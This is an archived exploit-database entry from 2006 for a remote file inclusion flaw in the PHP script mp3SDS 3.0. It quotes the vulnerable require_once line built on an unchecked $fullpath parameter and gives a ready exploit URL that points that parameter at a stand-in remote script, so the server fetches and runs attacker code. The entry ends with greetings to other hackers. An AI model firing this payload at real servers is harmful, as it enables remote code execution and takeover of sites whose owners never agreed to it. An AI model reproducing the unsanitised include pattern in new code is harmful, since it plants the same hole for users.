mp3SDS 3.0 - '/Core/core.inc.php' Remote File Inclusion

EDB-ID:

2666




Platform:

PHP

Date:

2006-10-28


Script: MP3 Streaming DownSampler for PHP v3.0 (fullpath) Remote File Include Exploit
Version: 3.0
Script Download: http://damac.us/Projects/mp3SDS/archive/mp3SDS-3.0.tgz
Code: require_once("$fullpath/Core/FormatName.fnc.php");
Exploit: Core/core.inc.php?fullpath=evilscripts?
Found: Cyber-Security
Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# milw0rm.com [2006-10-28]